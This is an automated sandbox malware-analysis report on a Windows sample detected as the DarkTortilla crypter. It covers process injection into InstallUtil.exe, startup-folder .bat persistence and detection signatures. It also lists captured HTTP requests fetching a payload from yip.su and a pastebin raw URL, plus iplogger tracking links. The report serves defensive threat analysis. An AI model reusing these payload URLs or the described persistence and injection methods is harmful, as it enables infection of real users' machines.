Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1490825
MD5:a7f1b43bb75327181bf5535f6eab329d
SHA1:b7d03ad2e90ea8f81ba755c6e5c551e2686c679c
SHA256:79cf97a156358a7dfba188f7b6d516e62279a11fb15b828bbd676b15633c008e
Tags:exe
Infos:

Detection

DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Creates HTML files with .exe extension (expired dropper behavior)
Drops script or batch files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A7F1B43BB75327181BF5535F6EAB329D)
    • InstallUtil.exe (PID: 4876 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cmd.exe (PID: 3224 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4024 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uknphp3q7QNTU5S7JDQd395T.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4416 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7jqZT4DOBm3RwAn2PcA575yH.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3648 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aQqevjV3RV9JJaF7h5x7Exf9.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pltF0lsLekfh4Kak6kjaROUd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4616 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aZULhs3yjKzrM4jdcsdY0pG.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6744 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPdKjWiyihutETqOInbK2Mh7.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
    00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
        00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
          Process Memory Space: file.exe PID: 1060JoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.2dc0be4.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              3.2.InstallUtil.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                0.2.file.exe.3e60010.4.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  0.2.file.exe.3eb0030.3.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                    0.2.file.exe.3eb0030.3.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                      Click to see the 5 entries

                      Sigma Signatures

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 4876, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: file.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: https://pastebin.com/raw/V6VJsrV3Avira URL Cloud: Label: malware
                      Source: https://yip.su/RNWPd.exeAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: file.exeReversingLabs: Detection: 28%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                      Networking

                      barindex
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: pastebin.com
                      Creates HTML files with .exe extension (expired dropper behavior)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 3BKVENDizermJCmNwCB42ME3.exe.3.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0.2.file.exe.2dc0be4.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.2dcff80.0.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                      Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                      Source: Joe Sandbox ViewIP Address: 172.67.188.178 172.67.188.178
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: iplogger.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: yip.su
                      Source: global trafficDNS traffic detected: DNS query: iplogger.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 09 Aug 2024 21:00:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 09 Aug 2024 21:01:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
                      Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
                      Source: file.exeString found in binary or memory: http://ocsp.digicert.com0C
                      Source: file.exeString found in binary or memory: http://ocsp.digicert.com0X
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                      Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yip.su
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drString found in binary or memory: https://counter.yadro.ru/hit?
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1djqU4
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drString found in binary or memory: https://iplogger.org/
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drString found in binary or memory: https://iplogger.org/privacy/
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drString found in binary or memory: https://iplogger.org/rules/
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV3
                      Source: file.exe, 00000000.00000002.2630838739.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630838739.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3535416416.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
